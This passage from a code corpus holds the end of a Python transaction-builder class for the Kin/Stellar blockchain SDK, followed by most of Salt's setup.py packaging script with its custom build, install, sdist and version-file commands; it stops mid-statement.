the generated Transaction via the list of operations in this instance. :return: A transaction envelope ready to send over the network. :rtype: :class:`TransactionEnvelope <kin_base.transaction_envelope.TransactionEnvelope>` """ if self.tx is None: self.gen_tx() te = Te(self.tx, network_id=self.network_name) if self.te: te.signatures = self.te.signatures self.te = te return te def gen_xdr(self): """Create an XDR object around a newly generated :class:`TransactionEnvelope <kin_base.transaction_envelope.TransactionEnvelope>`. :return: An XDR object representing a newly created transaction envelope ready to send over the network. """ if self.tx is None: self.gen_te() return self.te.xdr() def gen_compliance_xdr(self): """Create an XDR object representing this builder's transaction to be sent over via the Compliance protocol (notably, with a sequence number of 0). Intentionally, the XDR object is returned without any signatures on the transaction. See `Stellar's documentation on its Compliance Protocol <https://www.stellar.org/developers/guides/compliance-protocol.html>`_ for more information. """ sequence = self.sequence self.sequence = 0 tx_xdr = self.gen_tx().xdr() self.sequence = sequence return tx_xdr def hash(self): """Return a hash for this transaction. :return: A hash for this transaction. :rtype: bytes """ return self.gen_te().hash_meta() def hash_hex(self) -> str: """Return a hex encoded hash for this transaction. :return: A hex encoded hash for this transaction. :rtype: str """ return binascii.hexlify(self.hash()).decode() def import_from_xdr(self, xdr: Union[str, bytes]) -> 'Builder': """Create a :class:`TransactionEnvelope <kin_base.transaction_envelope.TransactionEnvelope>` via an XDR object. In addition, sets the fields of this builder (the transaction envelope, transaction, operations, source, etc.) to all of the fields in the provided XDR transaction envelope. :param xdr: The XDR object representing the transaction envelope to which this builder is setting its state to. """ te = Te.from_xdr(xdr) if self.network_name.upper() in NETWORKS: te.network_id = Network(NETWORKS[self.network_name]).network_id() else: te.network_id = Network(self.network_name).network_id() self.te = te self.tx = te.tx # with a different source or not . self.ops = te.tx.operations self.address = te.tx.source self.sequence = te.tx.sequence time_bounds_in_xdr = te.tx.time_bounds if time_bounds_in_xdr: self.time_bounds = { 'maxTime': time_bounds_in_xdr[0].maxTime, 'minTime': time_bounds_in_xdr[0].minTime } else: self.time_bounds = None self.memo = te.tx.memo return self def sign(self, secret: Optional[str] = None) -> None: """Sign the generated :class:`TransactionEnvelope <kin_base.transaction_envelope.TransactionEnvelope>` from the list of this builder's operations. :param secret: The secret seed to use if a key pair or secret was not provided when this class was originaly instantiated, or if another key is being utilized to sign the transaction envelope. """ keypair = self.keypair if not secret else Keypair.from_seed(secret) self.gen_te() self.te.sign(keypair) def sign_preimage(self, preimage): """Sign the generated transaction envelope using a Hash(x) signature. :param preimage: The value to be hashed and used as a signer on the transaction envelope. :type preimage: str, bytes """ if self.te is None: self.gen_te() self.te.sign_hashX(preimage) async def submit(self) -> dict: """Submit the generated XDR object of the built transaction envelope to Horizon. Sends the generated transaction envelope over the wire via this builder's :class:`Horizon <kin_base.horizon.Horizon>` instance. Note that you'll typically want to sign the transaction before submitting via the sign methods. :returns: A dict representing the JSON response from Horizon. """ return await self.horizon.submit(self.gen_xdr().decode()) def next_builder(self): """Create a new builder based off of this one with its sequence number incremented. :return: A new Builder instance :rtype: :class:`Builder` """ next_builder = Builder(horizon=self.horizon, network_name=self.network_name, fee=self.fee, secret=self.keypair.seed().decode(), sequence=self.sequence+1) return next_builder async def update_sequence(self) -> None: """ Update the builder with the next sequence of the account """ address = await self.horizon.account(self.address) self.sequence = int(address.get('sequence')) + 1 async def set_channel(self, channel_seed: str) -> None: """ # TODO: get keypair instead of seed, no need for crypto operation if not needed Set a channel to be used for this transaction :param channel_seed: Seed to use as the channel """ self.keypair = Keypair.from_seed(channel_seed) self.address = self.keypair.address().decode() await self.update_sequence()
the-stack_106_24315
#!/usr/bin/env python """ The setup script for salt """ # pylint: disable=file-perms,resource-leakage import contextlib import distutils.dist import glob import operator import os import platform import sys from ctypes.util import find_library from datetime import datetime # pylint: disable=no-name-in-module from distutils import log from distutils.cmd import Command from distutils.command.build import build from distutils.command.clean import clean from distutils.command.install_lib import install_lib from distutils.errors import DistutilsArgError from distutils.version import LooseVersion # pylint: disable=blacklisted-module import setuptools from setuptools import setup from setuptools.command.bdist_egg import bdist_egg from setuptools.command.develop import develop from setuptools.command.install import install from setuptools.command.sdist import sdist # pylint: enable=no-name-in-module try: from urllib2 import urlopen except ImportError: from urllib.request import urlopen # pylint: disable=no-name-in-module try: from wheel.bdist_wheel import bdist_wheel HAS_BDIST_WHEEL = True except ImportError: HAS_BDIST_WHEEL = False try: import zmq HAS_ZMQ = True except ImportError: HAS_ZMQ = False try: DATE = datetime.utcfromtimestamp(int(os.environ["SOURCE_DATE_EPOCH"])) except (KeyError, ValueError): DATE = datetime.utcnow() # Change to salt source's directory prior to running any command try: SETUP_DIRNAME = os.path.dirname(__file__) except NameError: # We're most likely being frozen and __file__ triggered this NameError # Let's work around that SETUP_DIRNAME = os.path.dirname(sys.argv[0]) if SETUP_DIRNAME != "": os.chdir(SETUP_DIRNAME) SETUP_DIRNAME = os.path.abspath(SETUP_DIRNAME) BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION = os.environ.get( # The user can provide a different bootstrap-script version. # ATTENTION: A tag for that version MUST exist "BOOTSTRAP_SCRIPT_VERSION", # If no bootstrap-script version was provided from the environment, let's # provide the one we define. "v2014.06.21", ) # Store a reference to the executing platform IS_OSX_PLATFORM = sys.platform.startswith("darwin") IS_WINDOWS_PLATFORM = sys.platform.startswith("win") if IS_WINDOWS_PLATFORM or IS_OSX_PLATFORM: IS_SMARTOS_PLATFORM = False else: # os.uname() not available on Windows. IS_SMARTOS_PLATFORM = os.uname()[0] == "SunOS" and os.uname()[3].startswith( "joyent_" ) USE_STATIC_REQUIREMENTS = os.environ.get("USE_STATIC_REQUIREMENTS") if USE_STATIC_REQUIREMENTS is not None: USE_STATIC_REQUIREMENTS = USE_STATIC_REQUIREMENTS == "1" try: # Add the esky bdist target if the module is available # may require additional modules depending on platform # bbfreeze chosen for its tight integration with distutils import bbfreeze # pylint: disable=unused-import from esky import bdist_esky # pylint: disable=unused-import HAS_ESKY = True except ImportError: HAS_ESKY = False SALT_VERSION = os.path.join(os.path.abspath(SETUP_DIRNAME), "salt", "version.py") SALT_VERSION_HARDCODED = os.path.join( os.path.abspath(SETUP_DIRNAME), "salt", "_version.py" ) SALT_SYSPATHS_HARDCODED = os.path.join( os.path.abspath(SETUP_DIRNAME), "salt", "_syspaths.py" ) SALT_BASE_REQUIREMENTS = [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "base.txt"), # pyzmq needs to be installed regardless of the salt transport os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "zeromq.txt"), os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "crypto.txt"), ] SALT_LINUX_LOCKED_REQS = [ # Linux packages defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "linux.txt", ) ] SALT_OSX_REQS = SALT_BASE_REQUIREMENTS + [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "darwin.txt") ] SALT_OSX_LOCKED_REQS = [ # OSX packages already defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "darwin.txt", ) ] SALT_WINDOWS_REQS = SALT_BASE_REQUIREMENTS + [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "windows.txt") ] SALT_WINDOWS_LOCKED_REQS = [ # Windows packages already defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "windows.txt", ) ] SALT_LONG_DESCRIPTION_FILE = os.path.join(os.path.abspath(SETUP_DIRNAME), "README.rst") # Salt SSH Packaging Detection PACKAGED_FOR_SALT_SSH_FILE = os.path.join( os.path.abspath(SETUP_DIRNAME), ".salt-ssh-package" ) PACKAGED_FOR_SALT_SSH = os.path.isfile(PACKAGED_FOR_SALT_SSH_FILE) # pylint: disable=W0122 exec(compile(open(SALT_VERSION).read(), SALT_VERSION, "exec")) # pylint: enable=W0122 # ----- Helper Functions --------------------------------------------------------------------------------------------> def _parse_op(op): """ >>> _parse_op('>') 'gt' >>> _parse_op('>=') 'ge' >>> _parse_op('=>') 'ge' >>> _parse_op('=> ') 'ge' >>> _parse_op('<') 'lt' >>> _parse_op('<=') 'le' >>> _parse_op('==') 'eq' >>> _parse_op(' <= ') 'le' """ op = op.strip() if ">" in op: if "=" in op: return "ge" else: return "gt" elif "<" in op: if "=" in op: return "le" else: return "lt" elif "!" in op: return "ne" else: return "eq" def _parse_ver(ver): """ >>> _parse_ver("'3.4' # pyzmq 17.1.0 stopped building wheels for python3.4") '3.4' >>> _parse_ver('"3.4"') '3.4' >>> _parse_ver('"2.6.17"') '2.6.17' """ if "#" in ver: ver, _ = ver.split("#", 1) ver = ver.strip() return ver.strip("'").strip('"') def _check_ver(pyver, op, wanted): """ >>> _check_ver('2.7.15', 'gt', '2.7') True >>> _check_ver('2.7.15', 'gt', '2.7.15') False >>> _check_ver('2.7.15', 'ge', '2.7.15') True >>> _check_ver('2.7.15', 'eq', '2.7.15') True """ pyver = distutils.version.LooseVersion(pyver) wanted = distutils.version.LooseVersion(wanted) if not isinstance(pyver, str): pyver = str(pyver) if not isinstance(wanted, str): wanted = str(wanted) return getattr(operator, "__{}__".format(op))(pyver, wanted) def _parse_requirements_file(requirements_file): parsed_requirements = [] with open(requirements_file) as rfh: for line in rfh.readlines(): line = line.strip() if not line or line.startswith(("#", "-r", "--")): continue if IS_WINDOWS_PLATFORM: if "libcloud" in line: continue try: pkg, pyverspec = line.rsplit(";", 1) except ValueError: pkg, pyverspec = line, "" pyverspec = pyverspec.strip() if pyverspec and ( not pkg.startswith("pycrypto") or pkg.startswith("pycryptodome") ): _, op, ver = pyverspec.split(" ", 2) if not _check_ver( platform.python_version(), _parse_op(op), _parse_ver(ver) ): continue parsed_requirements.append(pkg) return parsed_requirements # <---- Helper Functions --------------------------------------------------------------------------------------------- # ----- Custom Distutils/Setuptools Commands ------------------------------------------------------------------------> class WriteSaltVersion(Command): description = "Write salt's hardcoded version file" user_options = [] def initialize_options(self): """ Abstract method that is required to be overwritten """ def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): if ( not os.path.exists(SALT_VERSION_HARDCODED) or self.distribution.with_salt_version ): # Write the version file if getattr(self.distribution, "salt_version_hardcoded_path", None) is None: self.distribution.salt_version_hardcoded_path = SALT_VERSION_HARDCODED sys.stderr.write("This command is not meant to be called on it's own\n") sys.stderr.flush() if not self.distribution.with_salt_version: salt_version = ( __saltstack_version__ # pylint: disable=undefined-variable ) else: from salt.version import SaltStackVersion salt_version = SaltStackVersion.parse( self.distribution.with_salt_version ) # pylint: disable=E0602 open(self.distribution.salt_version_hardcoded_path, "w").write( INSTALL_VERSION_TEMPLATE.format( date=DATE, full_version_info=salt_version.full_info_all_versions ) ) # pylint: enable=E0602 class GenerateSaltSyspaths(Command): description = "Generate salt's hardcoded syspaths file" def initialize_options(self): pass def finalize_options(self): pass def run(self): # Write the syspaths file if getattr(self.distribution, "salt_syspaths_hardcoded_path", None) is None: print("This command is not meant to be called on it's own") exit(1) # Write the system paths file open(self.distribution.salt_syspaths_hardcoded_path, "w").write( INSTALL_SYSPATHS_TEMPLATE.format( date=DATE, root_dir=self.distribution.salt_root_dir, share_dir=self.distribution.salt_share_dir, config_dir=self.distribution.salt_config_dir, cache_dir=self.distribution.salt_cache_dir, sock_dir=self.distribution.salt_sock_dir, srv_root_dir=self.distribution.salt_srv_root_dir, base_file_roots_dir=self.distribution.salt_base_file_roots_dir, base_pillar_roots_dir=self.distribution.salt_base_pillar_roots_dir, base_master_roots_dir=self.distribution.salt_base_master_roots_dir, base_thorium_roots_dir=self.distribution.salt_base_thorium_roots_dir, logs_dir=self.distribution.salt_logs_dir, pidfile_dir=self.distribution.salt_pidfile_dir, spm_parent_path=self.distribution.salt_spm_parent_dir, spm_formula_path=self.distribution.salt_spm_formula_dir, spm_pillar_path=self.distribution.salt_spm_pillar_dir, spm_reactor_path=self.distribution.salt_spm_reactor_dir, home_dir=self.distribution.salt_home_dir, ) ) class WriteSaltSshPackagingFile(Command): description = "Write salt's ssh packaging file" user_options = [] def initialize_options(self): """ Abstract method that is required to be overwritten """ def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): if not os.path.exists(PACKAGED_FOR_SALT_SSH_FILE): # Write the salt-ssh packaging file if getattr(self.distribution, "salt_ssh_packaging_file", None) is None: print("This command is not meant to be called on it's own") exit(1) # pylint: disable=E0602 open(self.distribution.salt_ssh_packaging_file, "w").write( "Packaged for Salt-SSH\n" ) # pylint: enable=E0602 class Develop(develop): user_options = develop.user_options + [ ( "write-salt-version", None, "Generate Salt's _version.py file which allows proper version " "reporting. This defaults to False on develop/editable setups. " "If WRITE_SALT_VERSION is found in the environment this flag is " "switched to True.", ), ( "generate-salt-syspaths", None, "Generate Salt's _syspaths.py file which allows tweaking some " "common paths that salt uses. This defaults to False on " "develop/editable setups. If GENERATE_SALT_SYSPATHS is found in " "the environment this flag is switched to True.", ), ( "mimic-salt-install", None, "Mimmic the install command when running the develop command. " "This will generate salt's _version.py and _syspaths.py files. " "Generate Salt's _syspaths.py file which allows tweaking some " "This defaults to False on develop/editable setups. " "If MIMIC_INSTALL is found in the environment this flag is " "switched to True.", ), ] boolean_options = develop.boolean_options + [ "write-salt-version", "generate-salt-syspaths", "mimic-salt-install", ] def initialize_options(self): develop.initialize_options(self) self.write_salt_version = False self.generate_salt_syspaths = False self.mimic_salt_install = False def finalize_options(self): develop.finalize_options(self) if "WRITE_SALT_VERSION" in os.environ: self.write_salt_version = True if "GENERATE_SALT_SYSPATHS" in os.environ: self.generate_salt_syspaths = True if "MIMIC_SALT_INSTALL" in os.environ: self.mimic_salt_install = True if self.mimic_salt_install: self.write_salt_version = True self.generate_salt_syspaths = True def run(self): if IS_WINDOWS_PLATFORM: # Download the required DLLs self.distribution.salt_download_windows_dlls = True self.run_command("download-windows-dlls") self.distribution.salt_download_windows_dlls = None if self.write_salt_version is True: self.distribution.running_salt_install = True self.distribution.salt_version_hardcoded_path = SALT_VERSION_HARDCODED self.run_command("write_salt_version") if self.generate_salt_syspaths: self.distribution.salt_syspaths_hardcoded_path = SALT_SYSPATHS_HARDCODED self.run_command("generate_salt_syspaths") # Resume normal execution develop.run(self) class DownloadWindowsDlls(Command): description = "Download required DLL's for windows" def initialize_options(self): pass def finalize_options(self): pass def run(self): if getattr(self.distribution, "salt_download_windows_dlls", None) is None: print("This command is not meant to be called on it's own") exit(1) try: import pip # pip has moved many things to `_internal` starting with pip 10 if LooseVersion(pip.__version__) < LooseVersion("10.0"): # pylint: disable=no-name-in-module from pip.utils.logging import indent_log # pylint: enable=no-name-in-module else: from pip._internal.utils.logging import ( # pylint: disable=no-name-in-module indent_log, ) except ImportError: # TODO: Impliment indent_log here so we don't require pip @contextlib.contextmanager def indent_log(): yield platform_bits, _ = platform.architecture() url = "https://repo.saltstack.com/windows/dependencies/{bits}/{fname}.dll" dest = os.path.join(os.path.dirname(sys.executable), "{fname}.dll") with indent_log(): for fname in ("libeay32", "ssleay32", "libsodium"): # See if the library is already on the system if find_library(fname): continue furl = url.format(bits=platform_bits[:2], fname=fname) fdest = dest.format(fname=fname) if not os.path.exists(fdest): log.info( "Downloading {}.dll to {} from {}".format(fname, fdest, furl) ) try: from contextlib import closing import requests with closing(requests.get(furl, stream=True)) as req: if req.status_code == 200: with open(fdest, "wb") as wfh: for chunk in req.iter_content(chunk_size=4096): if chunk: # filter out keep-alive new chunks wfh.write(chunk) wfh.flush() else: log.error( "Failed to download {}.dll to {} from {}".format( fname, fdest, furl ) ) except ImportError: req = urlopen(furl) if req.getcode() == 200: with open(fdest, "wb") as wfh: while True: chunk = req.read(4096) if not chunk: break wfh.write(chunk) wfh.flush() else: log.error( "Failed to download {}.dll to {} from {}".format( fname, fdest, furl ) ) class Sdist(sdist): def make_release_tree(self, base_dir, files): if self.distribution.ssh_packaging: self.distribution.salt_ssh_packaging_file = PACKAGED_FOR_SALT_SSH_FILE self.run_command("write_salt_ssh_packaging_file") self.filelist.files.append(os.path.basename(PACKAGED_FOR_SALT_SSH_FILE)) sdist.make_release_tree(self, base_dir, files) # Let's generate salt/_version.py to include in the sdist tarball self.distribution.running_salt_sdist = True self.distribution.salt_version_hardcoded_path = os.path.join( base_dir, "salt", "_version.py" ) self.run_command("write_salt_version") def make_distribution(self): sdist.make_distribution(self) if self.distribution.ssh_packaging: os.unlink(PACKAGED_FOR_SALT_SSH_FILE) class BDistEgg(bdist_egg): def finalize_options(self): bdist_egg.finalize_options(self) self.distribution.build_egg = True if not self.skip_build: self.run_command("build") class CloudSdist(Sdist): # pylint: disable=too-many-ancestors user_options = Sdist.user_options + [ ( "download-bootstrap-script", None, "Download the latest stable bootstrap-salt.sh script. This " "can also be triggered by having `DOWNLOAD_BOOTSTRAP_SCRIPT=1` as an " "environment variable.", ) ] boolean_options = Sdist.boolean_options + ["download-bootstrap-script"] def initialize_options(self): Sdist.initialize_options(self) self.skip_bootstrap_download = True self.download_bootstrap_script = False def finalize_options(self): Sdist.finalize_options(self) if "SKIP_BOOTSTRAP_DOWNLOAD" in os.environ: # pylint: disable=not-callable log( "Please stop using 'SKIP_BOOTSTRAP_DOWNLOAD' and use " "'DOWNLOAD_BOOTSTRAP_SCRIPT' instead" ) # pylint: enable=not-callable if "DOWNLOAD_BOOTSTRAP_SCRIPT" in os.environ: download_bootstrap_script = os.environ.get("DOWNLOAD_BOOTSTRAP_SCRIPT", "0") self.download_bootstrap_script = download_bootstrap_script == "1" def run(self): if self.download_bootstrap_script is True: # Let's update the bootstrap-script to the version defined to be # distributed. See BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION above. url = ( "https://github.com/saltstack/salt-bootstrap/raw/{}" "/bootstrap-salt.sh".format(BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION) ) deploy_path = os.path.join( SETUP_DIRNAME, "salt", "cloud", "deploy", "bootstrap-salt.sh" ) log.info( "Updating bootstrap-salt.sh." "\n\tSource: {}" "\n\tDestination: {}".format(url, deploy_path) ) try: import requests req = requests.get(url) if req.status_code == 200: script_contents = req.text.encode(req.encoding) else: log.error( "Failed to update the bootstrap-salt.sh script. HTTP " "Error code: {}".format(req.status_code) ) except ImportError: req = urlopen(url) if req.getcode() == 200: script_contents = req.read() else: log.error( "Failed to update the bootstrap-salt.sh script. HTTP " "Error code: {}".format(req.getcode()) ) try: with open(deploy_path, "w") as fp_: fp_.write(script_contents) except OSError as err: log.error("Failed to write the updated script: {}".format(err)) # Let's the rest of the build command Sdist.run(self) def write_manifest(self): # We only need to ship the scripts which are supposed to be installed dist_scripts = self.distribution.scripts for script in self.filelist.files[:]: if not script.startswith("scripts/"): continue if script not in dist_scripts: self.filelist.files.remove(script) return Sdist.write_manifest(self) class TestCommand(Command): description = "Run tests" user_options = [ ("runtests-opts=", "R", "Command line options to pass to runtests.py") ] def initialize_options(self): self.runtests_opts = None def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): # This should either be removed or migrated to use nox import subprocess self.run_command("build") build_cmd = self.get_finalized_command("build_ext") runner = os.path.abspath("tests/runtests.py") test_cmd = [sys.executable, runner] if self.runtests_opts: test_cmd.extend(self.runtests_opts.split()) print("running test") ret = subprocess.run( test_cmd, stdout=sys.stdout, stderr=sys.stderr, cwd=build_cmd.build_lib, check=False, ) sys.exit(ret.returncode) class Clean(clean): def run(self): clean.run(self) # Let's clean compiled *.py[c,o] for subdir in ("salt", "tests", "doc"): root = os.path.join(os.path.dirname(__file__), subdir) for dirname, _, _ in os.walk(root): for to_remove_filename in glob.glob("{}/*.py[oc]".format(dirname)): os.remove(to_remove_filename) if HAS_BDIST_WHEEL: class BDistWheel(bdist_wheel): def finalize_options(self): bdist_wheel.finalize_options(self) self.distribution.build_wheel = True INSTALL_VERSION_TEMPLATE = """\ # This file was auto-generated by salt's setup from salt.version import SaltStackVersion __saltstack_version__ = SaltStackVersion{full_version_info!r} """ INSTALL_SYSPATHS_TEMPLATE = """\ # This file was auto-generated by salt's setup on \ {date:%A, %d %B %Y @ %H:%m:%S UTC}. ROOT_DIR = {root_dir!r} SHARE_DIR = {share_dir!r} CONFIG_DIR = {config_dir!r} CACHE_DIR = {cache_dir!r} SOCK_DIR = {sock_dir!r} SRV_ROOT_DIR= {srv_root_dir!r} BASE_FILE_ROOTS_DIR = {base_file_roots_dir!r} BASE_PILLAR_ROOTS_DIR = {base_pillar_roots_dir!r} BASE_MASTER_ROOTS_DIR = {base_master_roots_dir!r} BASE_THORIUM_ROOTS_DIR = {base_thorium_roots_dir!r} LOGS_DIR = {logs_dir!r} PIDFILE_DIR = {pidfile_dir!r} SPM_PARENT_PATH = {spm_parent_path!r} SPM_FORMULA_PATH = {spm_formula_path!r} SPM_PILLAR_PATH = {spm_pillar_path!r} SPM_REACTOR_PATH = {spm_reactor_path!r} HOME_DIR = {home_dir!r} """ class Build(build): def run(self): # Run build.run function build.run(self) salt_build_ver_file = os.path.join(self.build_lib, "salt", "_version.py") if getattr(self.distribution, "with_salt_version", False): # Write the hardcoded salt version module salt/_version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "build_egg", False): # we are building an egg package. need to include _version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "build_wheel", False): # we are building a wheel package. need to include _version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "running_salt_install", False): # If our install attribute is present and set to True, we'll go # ahead and write our install time python modules. # Write the hardcoded salt version module salt/_version.py self.run_command("write_salt_version") # Write the system paths file self.distribution.salt_syspaths_hardcoded_path = os.path.join( self.build_lib, "salt", "_syspaths.py" ) self.run_command("generate_salt_syspaths") class Install(install): def initialize_options(self): install.initialize_options(self) def finalize_options(self): install.finalize_options(self) def run(self): if LooseVersion(setuptools.__version__) < LooseVersion("9.1"): sys.stderr.write( "\n\nInstalling Salt requires setuptools >= 9.1\n" "Available setuptools version is {}\n\n".format(setuptools.__version__) ) sys.stderr.flush() sys.exit(1) # Let's set the running_salt_install attribute so we can add # _version.py in the build command self.distribution.running_salt_install = True self.distribution.salt_version_hardcoded_path = os.path.join( self.build_lib, "salt", "_version.py" ) if IS_WINDOWS_PLATFORM: # Download the required DLLs self.distribution.salt_download_windows_dlls = True self.run_command("download-windows-dlls") self.distribution.salt_download_windows_dlls = None # need to ensure _version.py is created in build dir before install if not os.path.exists(os.path.join(self.build_lib)): if not self.skip_build: self.run_command("build") else: self.run_command("write_salt_version") # Run install.run install.run(self) @staticmethod def _called_from_setup(run_frame): """ Attempt to detect whether run() was called from setup() or by another command. If called by setup(), the parent caller will be the 'run_command' method in 'distutils.dist', and *its* caller will be the 'run_commands' method. If called any other way, the immediate caller *might* be 'run_command', but it won't have been called by 'run_commands'. Return True in that case or if a call stack is unavailable. Return False otherwise. """ if run_frame is None: # If run_frame is None, just call the parent class logic return install._called_from_setup(run_frame) # Because Salt subclasses the setuptools install command, it needs to # override this static method to provide the right frame for the logic # so apply. # We first try the current run_frame in case the issue # https://github.com/pypa/setuptools/issues/456 is fixed. first_call = install._called_from_setup(run_frame) if first_call: return True # Fallback to providing the parent frame to have the right logic kick in second_call = install._called_from_setup(run_frame.f_back) if second_call is None: # There was no parent frame?! return first_call return second_call class InstallLib(install_lib): def run(self): executables = [ "salt/templates/git/ssh-id-wrapper", "salt/templates/lxc/salt_tarball", ] install_lib.run(self) # input and outputs match 1-1 inp = self.get_inputs() out = self.get_outputs() chmod = [] for idx, inputfile in enumerate(inp): for executable in executables: if inputfile.endswith(executable): chmod.append(idx) for idx in chmod: filename = out[idx] os.chmod(filename, 0o755) # <---- Custom Distutils/Setuptools Commands ------------------------------------------------------------------------- # ----- Custom Distribution Class -----------------------------------------------------------------------------------> # We use this to override the package name in case --ssh-packaging is passed to # setup.py or the special .salt-ssh-package is found class SaltDistribution(distutils.dist.Distribution): """ Just so it's completely clear Under windows, the following scripts should be installed: * salt-call * salt-cp * salt-minion * salt-syndic * salt-unity * spm When packaged for salt-ssh, the following scripts should be installed: * salt-call * salt-run * salt-ssh * salt-cloud Under windows, the following scripts should be omitted from the salt-ssh package: * salt-cloud * salt-run Under *nix, all scripts should be installed """ global_options = ( distutils.dist.Distribution.global_options + [ ("ssh-packaging", None, "Run in SSH packaging mode"), ( "salt-transport=", None, "The transport to prepare salt for. Currently, the only choice " "is 'zeromq'. This may be expanded in the future. Defaults to " "'zeromq'", "zeromq", ), ] + [ ( "with-salt-version=", None, "Set a fixed version for Salt instead calculating it", ), # Salt's Paths Configuration Settings ("salt-root-dir=", None, "Salt's pre-configured root directory"), ("salt-share-dir=", None, "Salt's pre-configured share directory"), ("salt-config-dir=", None, "Salt's pre-configured configuration directory"), ("salt-cache-dir=", None, "Salt's pre-configured cache directory"), ("salt-sock-dir=", None, "Salt's pre-configured socket directory"), ("salt-srv-root-dir=", None, "Salt's pre-configured service directory"), ( "salt-base-file-roots-dir=", None, "Salt's pre-configured file roots directory", ), ( "salt-base-pillar-roots-dir=", None, "Salt's pre-configured pillar roots directory", ), ( "salt-base-master-roots-dir=", None, "Salt's pre-configured master roots directory", ), ("salt-logs-dir=", None, "Salt's pre-configured logs directory"), ("salt-pidfile-dir=", None, "Salt's pre-configured pidfiles directory"), ( "salt-spm-formula-dir=", None, "Salt's pre-configured SPM formulas directory", ), ( "salt-spm-pillar-dir=", None, "Salt's pre-configured SPM pillar directory", ), ( "salt-spm-reactor-dir=", None, "Salt's pre-configured SPM reactor directory", ), ("salt-home-dir=", None, "Salt's pre-configured user home directory"), ] ) def __init__(self, attrs=None): distutils.dist.Distribution.__init__(self, attrs) self.ssh_packaging = PACKAGED_FOR_SALT_SSH self.salt_transport = None # Salt Paths Configuration Settings self.salt_root_dir = None self.salt_share_dir = None self.salt_config_dir = None self.salt_cache_dir = None self.salt_sock_dir = None self.salt_srv_root_dir = None self.salt_base_file_roots_dir = None self.salt_base_thorium_roots_dir = None self.salt_base_pillar_roots_dir = None self.salt_base_master_roots_dir = None self.salt_logs_dir = None self.salt_pidfile_dir = None self.salt_spm_parent_dir = None self.salt_spm_formula_dir = None self.salt_spm_pillar_dir = None self.salt_spm_reactor_dir = None self.salt_home_dir = None # Salt version self.with_salt_version = None self.name = "salt-ssh" if PACKAGED_FOR_SALT_SSH else "salt" self.salt_version = __version__ # pylint: disable=undefined-variable self.description = "Portable, distributed, remote execution and configuration management system" with open(SALT_LONG_DESCRIPTION_FILE, encoding="utf-8") as f: self.long_description = f.read() self.long_description_content_type = "text/x-rst" self.python_requires = ">=3.5" self.classifiers = [ "Programming Language :: Python", "Programming Language :: Cython", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX :: Linux", "Topic :: System :: Clustering", "Topic :: System :: Distributed Computing", ] self.author = "Thomas S Hatch" self.author_email = "[email protected]" self.url = "https://saltproject.io" self.cmdclass.update( { "test": TestCommand, "clean": Clean, "build": Build, "sdist": Sdist, "bdist_egg": BDistEgg, "install": Install, "develop": Develop, "write_salt_version": WriteSaltVersion, "generate_salt_syspaths": GenerateSaltSyspaths, "write_salt_ssh_packaging_file": WriteSaltSshPackagingFile, } ) if not IS_WINDOWS_PLATFORM: self.cmdclass.update({"sdist": CloudSdist, "install_lib": InstallLib}) if IS_WINDOWS_PLATFORM: self.cmdclass.update({"download-windows-dlls": DownloadWindowsDlls}) if HAS_BDIST_WHEEL: self.cmdclass["bdist_wheel"] = BDistWheel self.license = "Apache Software License 2.0" self.packages = self.discover_packages() self.zip_safe = False if HAS_ESKY: self.setup_esky() self.update_metadata() def update_metadata(self): for attrname in dir(self): if attrname.startswith("__"): continue attrvalue = getattr(self, attrname, None) if attrvalue == 0: continue if attrname == "salt_version": attrname = "version" if hasattr(self.metadata, "set_{}".format(attrname)): getattr(self.metadata, "set_{}".format(attrname))(attrvalue) elif hasattr(self.metadata, attrname): try: setattr(self.metadata, attrname, attrvalue) except AttributeError: pass def discover_packages(self): modules = [] for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, "salt")): if "__init__.py" not in files: continue modules.append(os.path.relpath(root, SETUP_DIRNAME).replace(os.sep, ".")) return modules # ----- Static Data --------------------------------------------------------------------------------------------> @property def _property_dependency_links(self): return [ "https://github.com/saltstack/salt-testing/tarball/develop#egg=SaltTesting" ] @property def _property_tests_require(self): return ["SaltTesting"] # <---- Static Data ---------------------------------------------------------------------------------------------- # ----- Dynamic Data --------------------------------------------------------------------------------------------> @property def _property_package_data(self): package_data = { "salt.templates": [ "rh_ip/*.jinja", "debian_ip/*.jinja", "virt/*.jinja", "git/*", "lxc/*", ] } if not IS_WINDOWS_PLATFORM: package_data["salt.cloud"] = ["deploy/*.sh"] if not self.ssh_packaging and not PACKAGED_FOR_SALT_SSH: package_data["salt.daemons.flo"] = ["*.flo"] return package_data @property def _property_data_files(self): # Data files common to all scenarios data_files = [ ("share/man/man1", ["doc/man/salt-call.1", "doc/man/salt-run.1"]), ("share/man/man7", ["doc/man/salt.7"]), ] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: data_files[0][1].append("doc/man/salt-ssh.1") if IS_WINDOWS_PLATFORM: return data_files data_files[0][1].append("doc/man/salt-cloud.1") return data_files if IS_WINDOWS_PLATFORM: 